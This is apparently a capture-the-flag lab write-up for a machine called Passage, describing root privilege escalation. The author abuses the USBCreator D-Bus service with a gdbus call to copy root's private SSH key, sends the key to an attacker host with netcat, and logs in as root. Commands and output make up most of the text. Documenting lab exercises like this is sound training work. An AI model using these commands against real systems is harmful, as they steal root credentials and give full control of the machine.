InfoSec LAB

Passage_Privilege_Escalation

Created: 2 min read

USBCreator

although unspecified, peas initially discovered that the target system is vulnerable to the usbcreator bug

Later, I found out that the the nadav user has made changes to 2 files to be able to access the USBCreator service. This allows me to exploit the USBCreator service.

upon searching on google to exploit this vulnerability, i came across this article

$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

The article points out that I am able to get the SSH key of the root user by exploiting this vulnerability using the following command

I will get right to it

nadav@passage:/tmp$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true
()

Executing the command

nadav@passage:/tmp$ ll ./id_rsa
-rw-r--r-- 1 root root 1675 mar 17 08:53 ./id_rsa

The private SSH key for the root user is indeed copied to the /tmp directory

nadav@passage:/tmp$ nc 10.10.14.4 2222 < id_rsa
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ nnc 2222 > id_rsa.root        
listening on [any] 2222 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.206] 54878
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ chmod 600 id_rsa.root

I transferred the private SSH key for the root user using Netcat I also set the permission bits to 600, so that SSH can read it as a valid SSH private key

┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ ssh root@$IP -i ./id_rsa.root    
last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
root@passage:~# whoami
root
root@passage:~# hostname
passage
root@passage:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:04:69 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.206/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:469/64 scope global mngtmpaddr dynamic 
       valid_lft 86395sec preferred_lft 14395sec
    inet6 fe80::250:56ff:feb9:469/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise

Interactive Graph View

Backlinks